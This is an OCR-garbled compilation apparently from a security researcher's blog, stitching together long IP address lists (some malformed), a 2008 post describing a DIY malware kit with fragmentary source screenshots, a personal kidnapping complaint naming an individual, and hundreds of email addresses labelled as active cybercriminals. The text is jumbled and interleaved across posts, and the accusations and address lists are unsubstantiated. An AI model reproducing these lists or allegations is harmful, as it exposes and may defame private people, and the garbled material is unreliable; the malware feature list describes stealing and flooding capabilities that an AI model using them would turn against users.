89.41.199.118 
192.36.125.2 
142.177.231.194 
77.81.1.134 
92.36.246.253 
64.191.95.59 
14718 


87.239.63.214 
89.42.255.67 
93.84.97.192 
81.198.12.7 
86.122.36.152 
213.145.44.38 
93.84.97.95 
89.24.116.3 
85.197.157.53 
189.69.243.114 
81.198.153.189 
86.61.27.161 
92.63.243.198 
91.146.169.61 
72.55.178.69 
89.24.231.29 
199.254.29.1 
222.77.187.219 
97.74.53.19 
58.253.67.188 
222.186.26.89 
66.132.144.178 
66.132.144.176 
216.239.138.4 
96.9.41.162 
216.21.232.22 
88.255.94.88 
59.57.14.119 
173.21.76.127 
173.25.25.38 
67.182.38.125 
98.119.126.38 
124.42.35.181 
59.3.227.47 
125.187.143.28 


14719 


125.4.81.96 
91.97.216.47 
94.23.169.229 
65.55.111.72 
185.9.159.59 
185.9.159.255 
176.33.87.19 
212.63.89.33 
59.159:9.:185 
98.138.88.139 
94.23.175.255 
229.169.23.94 
181.26.44.186 
98.138.197.222 
198.24.163.53 
98.138.197.218 
172.129.68.15 
66.151.181.32 
174.137.132.45 
69.43.161.134 
98.138.197.221 
83.136.82.16 
31.3.247.171 
184.168.75.86 
78.129.167.32 
31.3.255.77 
23.239.124.62 
218.87.158.147 
46.165.192.199 
212.83.149.24 
83.142.226.47 
198.154.63.213 
198.154.63.211 
94.76.218.145 
213.229.71.221 
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46.165.229.17 
46.165.221.216 
66.197.223.3 
66.197.223.2 
66.197.223.6 
66.197.223.5 
46.165.231.255 
75.98.168.7 
75.98.168.8 
98.138.213.185 
172.129.72.243 
98.138.213.211 
41.74.133.85 
172.129.4.76 
66.199.228.71 
1.9.2.12 
98.138.212.248 
145.74.19.134 
98.138.213.184 
65.111.175.49 
65.111.175.255 
49.175.111.65 
189.195.133.18 
98.138.213.179 
198.251.79.255 
98.138.213.212 
183.88.42.29 
79.181.127.121 
198.86.17.149 
1.5.9.6 
178.86.4.232 
178.86.4.239 
31.193.133.167 
27.54.93.162 
199.73.56.82 
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1.5.9.5 
199.73.56.87 
199.73.59.255 
85.17.95.168 
96.9.163.22 
96.9.191.255 
22.163.9.96 
173.192.18.135 
173.192.18.152 
173.192.118.195 
195.69.147.48 
185.5.2.6 
151.236.44.27 
64.251.14.9 
91.219.194.39 
1.5.7.4 
87.242.73.73 
68.168.137.11 
62.116.143.11 
62.116.143.255 
11.143.116.62 
213.229.113.6 
213.229.113.63 
31.31.196.35 
35.196.31.31 
188.138.78.227 
46.37.181.229 
6.113.229.213 
69.89.31.155 
69.89.31.255 
155.31.89.69 
94.23.13.6 
94.23.63.255 
6.13.23.94 


98.139.135.22 
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4.4.27 New DIY Malware in the Wild (2008-04-29 22:39) 


% Project! - Microsoft Visual Basic [rum] 


de Edit Yoew Project Format bu un Diagram Jook Add-Ins Window Help 
) 9 ery 9 


{ eo ‘}> no Res? t i 
Project - Project! x) 
G) Project - myFtp (Code) ~ — . ~ - - 
py 7 ia) =] 
|(Generaly +] ((Dectarations) > 
rc = Ss Pro; 1 (Proj 1 
ot Project] - modGetCommand (Code) = 3 —s esa 
[(General) pload r HTTPFLOOO. [~ ©} Forms (Form1.frm) 
= : : DB) foemeTP set (forme TPse 
SYNELOOD © &mabout (frmabout.émn 
Target BD Smcommandist (frmcom 
[ower sracsonctt com OB Smet (SmGet. frm) 
] Modules 
2] Gass Modules 
FakeHost 
Jrwwner 12q com 
Stealer 
1CQ-6 Passes [ P Keys 
Feetox i Key Stealer 
Commands 
[rvant 
Private Sub Check4 Ciici 
CheckS.Value = 0 [COMMAND UST] 
End Sub 
FIP-Setting: | Get Setting: | Save 
Private Sub CheckS Ciick() Upload bor j Refresh 
Check4.Value = 0 . ——— 
End Sub 
Private Sub Check? Ciick() 
Checké.Value = 0 
x) 


Yet another do-it-yourself malware is getting pitched as one with [1]low detection rate due 
to its proprietary nature, following the logic that based on the fact that few people will have 
it, it would somehow remain undetected for a longer period of time. The applied logic is 
however, excluding the possibility of used to recently purchased good as a bargain to obtain 
or improve the chances of obtaining access to another good or a service in the face of ac- 
cess to a closed for the public forum where exclusive tools and incidents are actively discussed. 


How is a seller of yet another DIY malware going to differentiate her market proposi- 
tion? Adding a service in the form of managing and verifying the buyer’s undetected binaries 
is slowly maturing into what 24/7 customer support service is for most market propositions - 
a commodity and something that’s often taken for granted. In the case of this DIY malware, 
the author is aiming to differentiate the proposition by also offering the source code of the 
malware, thus, embracing the open source mentality just like many other malware authors 
are, believing that innovation will come on behalf of those adding extra features and fixing 
bugs within the malware - and they are sadly right about the innovation belief. Some features 
of this malware : 


- Stealing an Uploading to a specific FTP ( ICQ, FireFox, WinXP Keys, CD Keys ) 
- HTTP Get Flooding 

- Syn Flooding and IP Spoofing 

- Process Hiding without Register Service 


- Hides from any kind of Taskmanager : Windows Taskmanager, Security Taskmanager ) 
1475 


98.139.135.21 
98.139.255.255 
22.135.139.98 
81.176.236.12 
811.176.237.255 
188.18.219.239 
184.168.64.173 
64.85.169.71 
64.85.169.73 
64.85.169.74 
64.85.169.72 
S.A 21 

3.1.2.2 

S.i:2 23 
21.135.139.98 
12.236.176.81 
1.8.1.21 
213.91.243.25 
213.91.255.255 
25.243.91.213 
67.227.197.144 
67.227.197.145 
216.172.173.56 
216.172.191.255 
56.173.172.216 
65.55.34.218 
188.225.178.118 
65.61.188.4 
199.59.57.41 
199.59.63.255 
41.57.59.199 
188.53.156.133 
66.199.11.186 
8.2.2.8 
98.138.19.88 
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88.19.138.98 
184.173.73.177 
184.173.73.191 
177.73.173.184 
5.2.2.4 
77.225.223.36 
66.147.244.92 
66.147.255.255 
92.244.147.66 
174.123.255.255 
96.125.162.172 
96.125.175.255 
93.86.128.141 
78.46.75.173 
173.75.46.78 
92.226.25.54 
95.19.55.188 
188.55.19.95 
78.129.132.14 
78.129.132.255 
14.132.129.78 
198.41.3.54 
67.15.47.4 
46.37.163.88 
46.37.163.95 
69.162.68.236 
69.162.68.232 
69.162.68.239 
69.162.127.255 
186.52.96.117 
37.247.48.176 
77.49.231.12 
24.231.26.16 
98.138.213.221 


187.114.142.17 
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98.138.213.217 


46.37.69.68 
75.98.143.255 
75.98.142.11 
75.98.142.12 
75.98.142.13 
75.98.142.14 
75.98.142.15 
75.98.142.16 
75.98.142.17 
75.98.142.18 
75.98.142.19 
75.98.142.21 
75.98.142.22 
75.98.142.24 
75.98.142.25 
75.98.142.26 
75.98.142.27 
75.98.142.28 
75.98.142.29 
75.98.142.31 
75.98.142.32 
75.98.142.33 
75.98.142.34 
75.98.142.35 
75.98.142.36 
75.98.142.37 
75.98.142.38 
75.98.142.39 
75.98.142.41 
75.98.142.42 
75.98.142.43 
75.98.142.44 
75.98.142.45 
75.98.142.46 
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75.98.142.47 
75.98.142.48 
75.98.142.49 
75.98.142.51 
75.98.142.53 
75.98.142.54 
75.98.142.55 
75.98.142.56 
75.98.142.57 
75.98.142.58 
75.98.142.59 
75.98.142.61 
75.98.142.62 
75.98.142.63 
75.98.142.64 
75.98.142.65 
75.98.142.66 
75.98.142.68 
75.98.142.69 
75.98.142.71 
75.98.142.72 
75.98.142.73 
75.98.142.74 
75.98.142.75 
75.98.142.76 
75.98.142.77 
75.98.142.78 
75.98.142.79 
75.98.142.81 
75.98.142.82 
75.98.142.83 
75.98.142.84 
75.98.142.85 
75.98.142.86 
75.98.142.87 
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75.98.142.88 
75.98.142.89 
75.98.142.91 
75.98.142.92 
75.98.142.93 
75.98.142.94 
75.98.142.95 
75.98.142.96 
75.98.142.97 
75.98.142.98 
75.98.142.99 
75.98.142.111 
75.98.142.112 
75.98.142.113 
75.98.142.114 
75.98.142.115 
75.98.142.116 
75.98.142.117 
75.98.142.118 
75.98.142.119 
75.98.142.121 
75.98.142.122 
75.98.142.123 
75.98.142.125 
75.98.142.126 
75.98.142.127 
75.98.142.128 
75.98.142.129 
75.98.142.131 
75.98.142.132 
75.98.142.133 
75.98.142.134 
75.98.142.135 
75.98.142.136 
75.98.142.137 
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75.98.142.139 
75.98.142.141 
75.98.142.142 
75.98.142.143 
75.98.142.144 
75.98.142.145 
75.98.142.146 
75.98.142.147 
75.98.142.148 
75.98.142.149 
75.98.142.151 
75.98.142.153 
75.98.142.154 
75.98.142.155 
75.98.142.156 
75.98.142.157 
75.98.142.158 
75.98.142.159 
75.98.142.161 
75.98.142.162 
75.98.142.163 
75.98.142.164 
75.98.142.165 
75.98.142.167 
75.98.142.168 
75.98.142.169 
75.98.142.171 
75.98.142.172 
75.98.142.173 
75.98.142.174 
75.98.142.175 
75.98.142.176 
75.98.142.177 
75.98.142.178 
75.98.142.179 
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75.98.142.181 
75.98.142.182 
75.98.142.183 
75.98.142.184 
75.98.142.185 
75.98.142.186 
75.98.142.187 
75.98.142.188 
75.98.142.189 
75.98.142.191 
75.98.142.192 
75.98.142.193 
75.98.142.195 
75.98.142.196 
75.98.142.197 
75.98.142.198 
75.98.142.199 
75.98.142.211 
75.98.142.212 
75.98.142.213 
75.98.142.214 
75.98.142.215 
75.98.142.216 
75.98.142.217 
75.98.142.218 
75.98.142.219 
75.98.142.221 
75.98.142.222 
75.98.142.223 
75.98.142.224 
75.98.142.225 
75.98.142.226 
75.98.142.227 
75.98.142.228 
75.98.142.229 
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75.98.142.231 
75.98.142.232 
75.98.142.233 
75.98.142.234 
75.98.142.235 
75.98.142.236 
75.98.142.237 
75.98.142.238 
75.98.142.239 
75.98.142.241 
75.98.142.242 
75.98.142.243 
75.98.142.244 
75.98.142.245 
75.98.142.246 
75.98.142.247 
75.98.142.248 
75.98.142.251 
75.98.142.252 
75.98.142.253 
75.98.142.254 
75.98.142.23 
75.98.142.52 
75.98.142.67 
75.98.142.124 
75.98.142.138 
75.98.142.152 
75.98.142.166 
75.98.142.249 
217.171.66.245 
217.171.67.255 
245.66.171.217 
88.198.8.119 
88.198.44.22 
88.198.63.255 
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22.44.198.88 
88.198.15.255 
119.8.198.88 
212.227.215.255 
184.172.239.41 
184.173.255.255 
41.239.172.184 
85.17.45.29 
85.17.45.255 
29.45.17.85 
83.133.124.221 
83.133.127.255 
221.124.133.83 
85.25.145.63 
62.146.28.82 
79.124.76.55 
79.124.95.255 
55.76.124.79 
94.155.91.255 
91.215.218.14 
195.66.225.111 
78.152.56.2 
87.121.151.13 
195.81.49.42 
195.81.49.41 
87.118.132.118 
91.215.219.1 
174.122.49.67 
174.122.49.64 
174.122.49.95 
67.49.122.174 
67.23.19.161 
67.23.47.255 
161.19.23.67 
174.143.123.118 
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98.129.84.173 
198.65.141.97 
198.64.134.129 
Stay tuned! 


1. https://1.bp. blogspot . com/-OXgPgFdZy2E/YEhuSNH3EYI/AAAAAAAAL98/W9rKV9dKLI8QbcRRwO7yVwKtM- IKSRWJACLCBGASYHQ 
s1005/Misc_01.png 


17.3.9 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic 
of Bulgaria - Part Three (2021-03-19 07:47) 


[1] 


—— 
a er2010 « a 
4a a ENHKPHSA 
BALOKG 
u4en, na 27 roanHE 
9 Taqe 
THIS 
~ ; 


BE Mos 
Tlonog 3a macTosmara xocnmTaamsanaa: [locrenna 42a mpee ImuT ) 
MCHXHATPHNCH CTaUHOHAp HM O HMACTORUMIA MOMCHT He ¢ nNoOAIBA 
CORCMIMAAHSHPaHA NcHxHaTpHuna Gowout, Jlorege.c Upeguema na, PY wm 
< a ee Uldiden rosGe AR YT 

Hoy HOr su OT -PONHTEAETe BPOMABGRA.R powexenueTO AATHpA o 
POTATO HA- MECC OAM, KOLATO, 3aMHEOA WA WKHNCe CAM Ha KBapTHpa } 
Casbysrzcdipes arepsua meceu moarepkaa exeHenHa uppaKa Cc TAX Ik 
cRosmpoma, Mo: cACH TOBA cnpAA nace obama. Ha nosERHTBAHHA OT TAXHI 
HCTPAMA HO OFNOBBPAA HAH H3KAIOUBAA TeaedpormTe cu. Topa rH MmpitTrecHitao 1 
Te SANOWNAAM Ja TO H3GHpHaT axTHBHO. TloayavaHt MuCMO OT Xa3aHHa, 4e Br 
15.09.10r. tpxGea ma ocnoGon#t KBapTHpaTa, a TAKA CbULO HM HAKOAK: 
DGGARMARNEA 3A. HETIAATCHH AMIHMFOBH BHOCKH 3a 3aKyNeH OT CHMA MM AarTon 
Ha nocottenara fava Te orHinan » Cocbus, KRIeTO HaMepHaH CHHa cH ma cm 
8 knapripata. Orkasna, aa ropopH ¢ Tax, 6a rpy6 u xsaneH. CeOpaan wt 
Serexa 30570 cc BEpHaT » Tpoan, Tol mt ocranna npea KDapTHpaTa m0; 
. MPSCAAOM, 4e ¢ 3acT Ht JAMHHAaA HAKEE C TaxcH, Cact saBpbutaneto B Tpos? 
OTKAIGAA JA KOHTAKTYBA C POJUITCAHTe HC ApyrH nosHaTH. SaTBapAA ce 1m 
SGA B CTAATA Cit, OTKAIBAA AA Ce Xpaitit Saco c Tax. Hanyckaa Aoma cu 6c 
‘RA fawa OGACHCHHA KDRe xXOmM HM Kora me ce BEpHe. Mpomanara 1 
SROMCACUHCTO ,aty SHAAyKONCTATHpaHA HM oT ccem H NPHATCAH Hi 
pcemeliporo, ‘Konto Jlanvo novMiHHaBaA KaTO Harrbalto NenosnaTH. Mp: 
ornpanenn 2a6eacxKKH oT Crpana wa Maiikara ,3arl0uBaa fa araesa Aoui0” 
HancaKEe Xone, C MpcHOCHMHaA KoMMioTDp. Tacmaa TeacBH3HA oT oKOM 
MCTLP PASCTOAHHE, SAKAIOUHAA H TO HAKOAKO IThTH MponepABAA BXOLHAT: 
BpaTa (gaxaioiena. Hettocpeacrseno npegH HaMecaTa Ha NOAMUMAT: 
ganounar Di BHO, CMCCBAA CNOMEHH OT METCTBOTO C HaCKopy 
* nye teviguuy. ynorpesana MHOTO KOMMOThpHt TEPMHH ZO CTeneH H 

Repasii pagiocr. 


_ 


Dear blog readers, 
14732 


- Settings can be changed all time. ( in running bots as well ) 

- Melting 

- Mutexes Checking 

- Anti VMware, Anti VPC, Anti Sandboxing, Anti Norman Sandbox 
- Settings encrypted with RC-4 


- Doesn't need .ocx 
- Killing Windows Firewall 


File EGR View Project Format Debug Rum Query Diagram Tools Add-ins Window Help 


B-ao-T SH A - >i a SH SBRADS wc 
x 
; “i olf Project - modRC# (Code) felfe is 
[(Gereraip ~) [rcs ~) 
a) 
Public Function RC4(ByVal Expression As String, ByVal Passwc> 
A fai On Error Resume Next 
"Pointer| 
Ve 
& 
a 
ay 3 
oo 
ee | Private Declare Function WinExec Lib "kernel32" (ByVal lpCedlin|, 
8 ~ Private Declare Function GetComputerName Lib "kernelS2.dl1" _ 
x Alias "GerComputesNameA” ( _ 
al ByVal lpBuffer As String, _ 
= nSize As Long) As Long 
ma % Private Declare Function WaitForSingleObject Lib "kernel32" ( _ 


ByVal hHandle As Long, _ 
ByVal GwHilliseconds As Long) As Long 


Private Sub Form _Load() 
On Error Resume Next 


‘App.TaskVisible = False 
"Me .Hide 


"Call Anti 
Call DecryptWebHost a", Foem 


Layout x 
Call GetCommandHITP (txtWebhostl.Text) | | 
7 a 


It looks and sounds, as a novice malware coder integrating publicly obtainble malware 
modules, hoping to cash in. Moreover, in regard to open source malware, questioning "Which 
is the latest version of the MPack web exploitation kit?" is slowly becoming pointless mainly 
because of the kits’ open source nature, and besides localizing them to different languages, 
their effectiveness is also acting as the foundation for malware kits to come. 


Related posts: 
[2]DIY Exploit Embedding Tool - A Proprietary Release 
[3]DIY Exploits Embedding Tools - a Retrospective 
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Continuing the "[2]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Re- 
public of Bulgaria" series I’ve decided to post yet another update on my current situation in my 
home town Troyan in Bulgaria where | was originally illegally arrested and kidnapped by local 
police officers from Troyan Police using a stolen ID from my place with no witnesses and with 
force and for holding me hostage for a period of several months with no explanation and no 
legal action and injecting me on a daily basis. 


Sample personal photo of my second personal kidnapper circa 2010 - Bacun Moes Fayescku - 
(https://www.facebook.com/profile.php?id=100030506870037): 


[4] 
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Primary points of contacts in case someone is worried about well-being and whereabouts in 
this case should be: 


Email: dans@dans.bg 

Telefon za korupciq na slujiteli na MVR - 02 / 982 22 22 
GDBOP - Signal za korupcig i izpirane na pari - gdbop@mvr.bg 
Nachalnik RPU Troyan - rutr.lo@mvr.bg 

Troyan Police - Email: police _troyan@abv.bg 

Troyan Hospital - Email: mbal _troyan@abv.bg 

Lovech Psychiatry Clinic - Email: dpblovech@abv.bg 

Troyan Municipality - Email: mail@troyan.bg 


1. https://1.bp. blogspot .com/-m8s1FnrZ_EE/YEzIkIe630I/AAAAAAAAL-c/Lc6QMOgT6Mwz6r 9peX9t feN3-DhmfQaWgCLcBGAsYHQ 
s1600/Dancho_Danchev_2010. png 
https: //ddanchev. blogspot .com/2021/02/dancho-danchevs-disappearance- 2010. htm 


2. 
3. https://1.bp.blogspot .com/-TD2NqiPUAqc/YEweIGk_PzI/AAAAAAAAL-M/MrlvJTkQgdcAB6s8-BPm5DsN-C_DU86nACLcBGAs 


HQ/s720/Misc_01.jpg 


4. https://1.bp. blogspot .com/-Nscv8AzD_HU/YEz1IjFrzmwI/AAAAAAAAL-U/tq2quui7yggRNW-brbHEY11qkJ1gt9cDQCLcBGAsYHQ 


s1600/Misc_01. jpg 


17.3.10 Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Eight (2021-03-20 12:16) 


[1] 
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Dear blog readers, 


Continuing the "[2]Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses" blog post series I’ve decided to share yet another currently active personal email 
portfolio of high-profile cybercriminals with the idea to assist U.S Law Enforcement and the 
U.S Intelligence Community on its way to track down and prosecute the cybercriminals behind 


these campaigns. 


Sample personal emails belonging to high-profile cybercriminals that are currently active and 


are known to have participated in related cybercrime-friendly campaigns: 


dark _phoenix1981@yahoo.com 
sponky _gee@yahoo.com 
remyremoy@yahoo.com 
bletch.dope@yahoo.com 
xb@live.com 
walephillip00100@yahoo.com 
catherine00442@yahoo.com 
pricelessbond@hotmail.com 
angelfoxs81@gmail.com 
juerodf@hushmail.com 
ehsan.kalak@gmail.com 
nOewOrm@hotmail.com 
ososgg53@yahoo.com 
lionsgateanonim@hotmail.com 
saodenl1978@yahoo.com 
yamazago2@gmail.com 
robinhood1312@gmail.com 
dodol@lo.com 

litle bash _niggar@yahoo.com 
jeff@clickatec.com 
djeuro@gmail.com 
nhatphat@ds. fff 
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farmanullahkhan@gmail.com 
zahirabs@gmail.com 
besihere@hotmail.com 
fdgg@gmail.com 
pandp1l000@yahoo.com 
jayanth.das@gmail.com 
nflo95@yahoo.com 
drilon-al@live.com 
rOx@urbanr0Ots.net 
b4ti@live.com 
deolal02@yahoo.com 
fatherteddy@hotmail.com 
dianniema@aol.com 
david@rossiter53.freeserve.co.uk 
djletrinn@yahoo.com 
cannolil9@msn.com 
hufnagle3@hotmail.com 
slick5 7@hotmail.com 
bettyoeschl1@yahoo.com 
get@gilabend.net 
china@lcix.net 
victor@geodan.nl 
bg12006@hotmail.com 
dbriggs1963@yahoo.com 
calderon3@aol.com 
dfimanager@aol.com 
carels61@hotmail.com 
bhawks@radford.edu 
ccnickerson@hotmail.com 
jwatts@ccdi.net 
asda@yahoo.com 

qendra _rrezarti@live.com 
supas888@gmail.com 
wrclak@gmail.com 
musa.lovealbania@live.com 
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albi bm@hotmail.com 
hhila.al@hotmail.com 
ozyl0calhost@gmail.com 
negative-al@live.com 
benamoremin@ymail.com 
d0Om@kumanova.com.mk 
donveliu@gmail.com 
blackoss@hotmail.it 
chocho.decassidy@yahoo.com 
christal98730@yahoo.com 
al2@live.com 

baby _mimi78@yahoo.com 
kort ah2010@yahoo.com 
wino@pentagon.al 
servis@kokoin.com 
endurancejj@yahoo.com 
gjani.jaha-xx@live.com 
go-1@bisedime.net 
testicles@testicles.com 
ther@gmail.com 
refill.tools@yahoo.com 
joeluvg@yahoo.com 
sunrise20051@yahoo.com 
sdaada@gmail.com 
medi5usa@gmail.com 


jodbryandavis@gmail.com 


michaeldennison0l1@yahoo.com 


dr.admin@yahoo.com 
ray4evol@live.com 
vdeckard2013@gmail.com 
bessar-h@hotmail.com 
souljah7@live.com 

own _w@yahoo.com 
aaQ@live.fr 


salmansajid1209@gmail.com 
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wasker@msn.com 
lukas.podolski21@hotmail.com 
ees@gmail.com 
choppersmoney@yahoo.com 
dmixerl@yahoo.com 
ijsje@in.com 
yakuza2013@live.fr 
sssdpy@yahoo.com 
paulhert@ymail.com 
database001@live.com 
Deistkoy@hotmail.com 
chidexosinawataburuogarayan@yahoo.com 
i need onemic@yahoo.com 
happytimehome@yahoo.com 
elprinciiL017@gmail.com 
fazee6@gmail.com 
noemymc12@hotmail.com 
jamesmaga333@yahoo.com 
c862171@rmgkr.net 
braveheddy@yahoo.com 
tookta995@yahoo.com 
paniagua@hotmail.com 
in.famuzkid@gmail.com 
princedemie@rocketmail.com 
hdhdhdh@yahoo.com 
hdghgdfbgdfb@yahoo.com 
suny.sial@yahoo.com 

list _vipe@yahoo.com 
rolandacaves711@yahoo.com 
bad _bojz@hotmail.com 
fluxcOd3r@fbi.al 
grannl1t@live.com 
marjusleka@gmail.com 
thisisbujar@live.com 
jurgenlleshi@hotmail.com 
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dota2-al@hotmail.com 
auraa.1@hotmail.com 
gaepriba@fakeinbox.com 
pct.team@live.com 

ghetto Geassy@hotmail.com 
majordayo007@yahoo.com 
virOn@hotmail.com 
ch007007@gmail.com 
d.robert@yahoo.cn 
drshow05@hotmail.com 
kurac@gmail.com 
cscsccs@aol.com 
adrian.florinS50@gmail.com 
donwell44@yahoo.com 

vcc _Sell@hotmail.com 
liuoojdhj@hotmail.com 
toilaail806@gmail.com 
themasterpiece@outlook.com 
oluwacoded007@yahoo.com 
Ichood@netzero.com 
selasiewan@gmail.com 
clavelinmichael@hotmail.com 
paulkaka27@gmail.com 
gahal156@hotmail.com 
fuck@gmail.com 
wxcv6575@yahoo.fr 
mutinyinside@hotmail.com 
cindy liveOQ98@yahoo.com 
keemodas@yyahoo.com 
boon2k13@gmx.com 

funky _enero@yahoo.com 
almightydumps@yahoo.ca 
gs.pl@mail.com 
ppbugul@gmail.com 


vadaumuica@aol.com 
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jazzz@gmail.com 
majikz@hotmail.co.uk 
rilind-123@hotmail.com 
anonnep07@gmail.com 
daughton@ovi.com 
asdasdasdasd@yahoo.com 
ksc-crew@live.com 
trafficbyer777@hotmail.com 
olofofosgrace@gmail.com 
silver.root@yahoo.com 
kenny5661@gmail.com 
spyderbibek44@gmail.com 
mail@mail.ru 
rond@yopmail.com 
approovd@gmail.com 
marocx@lol.com 
joao.dacosta@aol.com 
llsosos@hotmail.com 
frankxng@gmail.com 
pay@pookie.biz 
shadowwalker2@ymail.com 
scot.wages@yahoo.com 
jamesmaga444@yahoo.com 
b.guyS17@ymail.com 
abey.clark@yahoo.com 
asabdulsami7@gmail.com 
haha@live.com 
agathekohn@yahoo.com 
555910@yahoo.com 
crev@omail.pro 

t _merkuri@yahoo.com 

hat _group2@hotmail.com 
leonardnuzzo@gmail.com 
johnbosco130@gmail.com 
h@gmai.com 
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leadercom@hotmail.com 
chinowong29@yahoo.com 
waheguru12345@gmail.com 
junglebook1000@yahoo.com 
Nagernas@yahoo.com 
JohnnyCougar14@gmail.com 
elijah.umufo@yahoo.com 
kassperi-hackers@msn.com 
zonausSa@gmail.com 
joegrey3@yahoo.com 
mazo.maz@aol.com 
babsodone@hotmail.com 
akaminosky@yahoo.co.uk 
kristoffer94@hotmail.com 
bad hacker33@hotmail.com 
tyjghg@fgsd.cc 
horus.red77@hotmail.com 
cwcw@live.com 


cooler@hotmail.com 


RemediosKoeglerdhI@yahoo.com 


tini _124@hotmail.fr 
librasomme@yahoo.it 
hack-forums@live.com 
h5g@live.fr 
durdukhz@gmail.com 
zoro spain@hotmail.com 
mike _will b@yahoo.com 
pragausmh@gmail.com 
ochusy@yahoo.com 
collinswhite2016@gmail.com 
Djdeivisl2@gmail.com 
d_charlie58@yahoo.com 
vitalyshO9@gmail.com 
jamaada _kk@yahoo.com 
noon89@hotmail.fr 
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Itdcc@ymail.com 

my _name _is_money@yahoo.com 
lolman@iman.org 
david4garry@yahoo.com 
vivovivo@hushmail.com 
lleexx00@hotmail.com 
lifeandlovel970@yahoo.com 
goodmoney165@yahoo.vom 
bwoodlit@yahoo.com 
footsex@mailinator.com 
fearwoman01@mail.ru 
aqulel@ymail.com 
ninthvisitor@yahoo.com 
anona@hotmail.com 
juventini alb@hotmail.com 
roneysouza2008@gmail.com 
paulbane@hushmail.com 
aasdwas@assad.com 
dni@hotmail.fr 
info@low2.com 
prudentialsO0O2@yahoo.com 
testl1@yopmail.com 
tedistefanil2@hotmail.com 
tryouteris@gmail.com 
peterknightw5@yahoo.com 
sakr sakr651@yahoo.com 
kjhgfd@ytgaj.com 
room101@yahhoo.com 
med551014@hotmail.fr 
alexanderk10000@gmail.com 
archambula2011@hotmail.com 
fl.smithO65@yahoo.com 
dumpstoday@yahoo.com 
nanatinasi@yahoo.com 
markcheng84@yahoo.com 
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[4]DIY German Malware Dropper 


[5]DIY Fake MSN Client Stealing Passwords 


[6]A Malware Loader for Sale 

[7]Yet Another Malware Cryptor In the Wild 
[8]DIY Malware Droppers in the Wild 
[9]More Malware Crypters for Sale 

[10]A Multi-Feature Malware Crypter 


. http://ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 


ttp://ddanchev.blogspot.com/2008/04/diy-exploit-embedding-tool-proprietary.htm 
_hetp://adanchey blogspot. con/2001/08/aiy-exploits-enbedding-toolshtal 

Ee enactes bicesce con 70a cereaaacinarecceogper cel 
ttp://ddanchev.blogspot.com/2008/01/diy-fake-msn-client-stealing-passwords .htm 
Ec: / aacbev beget con 200 /0s/axicare toater-dorcacie neal 
_hvtp://adanchey. blogspot. con/2007/06/yet-ancther-nalvare-cryptor~in-¥ild heal 
Fey 7 amacnee, tlontpst con 2001/05 aig maimure croppers ax sua neal 
_hetp://adanchey blogspot. cou/2001/01 /nore-malvare-crypters-for-sale. nl 

10. http: //adanchev. blogspot com/2007/07/ault~feature-nalvare~crypter.html 
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losrpk@losrpk.com 
makeitlooks@gmail.com 
kotigold@hotmail.it 
amoswmartheur67@hotmail.com 
seanpark26@yahoo.com 
krim4eva@yahoo.com 
lumous4all@yahoo.com 
telsonmike@yahoo.com 
iakiukutava@aol.com 
2548411776@qq.com 

soft kid@ymail.com 
h4k4zworld@yahoo.com 
samuelsm79@gmail.com 
colly227@gmail.com 
elmaximo414@hotmail.com 
zkinkon@yahoo.com 
deboydeboy1@yahoo.com 
mytimey@yahoo.com 
boosieclouds@yahoo.com 
smillinggeorge@yahoo.com 
davasmuie@gmail.com 
plumper@plumper.com 
magret.canard@free.fr 
t.zarbot@gmail.com 
kizzky@hotmail.com 
psterlings@yahoo.com 
cocol11@aol.com 
nattydogg@ymail.com 
vandalotop2skill2@gmail.com 
wilton.jacob@yahoo.com 
sandra _woodbery@yahoo.com 
hackk@live.fr 
122617075@qq.com 

toty _pops2007@yahoo.com 
baget@tormail.org 
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yahright@gmail.com 
blife500@yahoo.com 
krayolafv@hotmail.es 
moby886@gmail.com 
buydump@163.com 
lonerangerx7x83@yahoo.com 
mshurlene@yahoo.com 
h.dplLO@yahoo.com 
hell123@gmail.com 
krantz121@yahoo.com 
walex.akoga@yahoo.com 
willfun2bwith@yahoo.com 
yashveenn@gmail.com 
hakimkinko@yahoo.com 
makteejay112@yahoo.com 
huyin@bk.ru 
mikejjwilliams@yahoo.com 
cyber.net.514@gmail.com 
rocking@live.com 
bobxmpp@yahoo.com 
monymonylover@yahoo.com 
jerykind@yahoo.com 
mikedean2x@gmail.com 
faucher1@live.com 
damilolaadebola05@yahoo.com 
mr.ibrahimlamorde68@yahoo.com 
dr _microm@yahoo.in 
tombui9110@gmail.com 
denis.soto50@yahoo.com 
jamminsure@gmail.com 
s6zla@yahoo.com 
info@sliverlines.com 
bit.toxic@yahoo.com 
firedanger492@yahoo.com 
fatisurvim@hotmail.com 
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emetrapesea@hotmail.com 
drilon demolli@zbavitu.net 
kerimherrmann@yahoo.de 
donarti3@hotmail.com 
makemoney69@hotmail.fr 
ubh4ck@hackshgip.al 
drilonnpajazitii@gmai.com 
jonnhyevans@yahoo.com 
kanecheck@yahoo.com 
josepharra@hotmail.com 
zamzam@linuxmail.org 
rfgdsfgsdfg@gmail.com 
fsfssdf44@gmail.com 
richardscottl969@yahoo.com 
moha _romio _2010@yahoo.com 
sonona70@gmail.com 
misterbaker86@yahoo.com 
darahvieh@gmail.com 
tomki@pentagoncrew.com 
toshiba00@gmx.fr 
phogen@safe-mail.net 
clavomax@gmail.com 
rumicana@gmail.com 
barbuchamp@gmai.com 
gjani-e@msn.com 
lets.spam@yahoo.com 
WwWwwww@gmail.com 
vityal599@mail.ru 
coolcarder@yahoo.com 
ppcashout@ymail.com 
edon.2@hotmail.com 
ratibeeh@yahoo.com 
jancuk@gmail.com 
felizmoni@yahoo.com 


winser@mail.com 
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spirit _ghost@yahoo.com 
jaknco@yahoo.com 
stevmill41@yahoo.com 
humphreyhumphreydman@yahoo.com 
aimeyallen@yahoo.com 
david.okonor@yahoo.com 
naaag@live.com 
njnighht@yahoo.com 
aaaa@rgdgdg.com 
e1l@hotmail.com 
gdgdgdgd@yahoo.com 
smith2g3@yahoo.com 
uyatas@yahoo.com 
mr.manishteli@rediffmail.com 
adm212144@yahoo.com 
crim3@ymail.com 
j.smith93@hushmail.com 
d.pet2@yahoo.com 
kush9960@gmail.com 
joephils@gmail.com 
love.sql2011@yahoo.com 
cliffantell@yahoo.com 
yemijoseph@yahoo.com 
walex.akogal@yahoo.com 
ekpobalo@gmail.com 
drshow02@hotmail.com 
d-esse@live.ca 
toisay@yahoo.com 
gurutoolz@yahoo.com 
robsbaker@gmail.com 
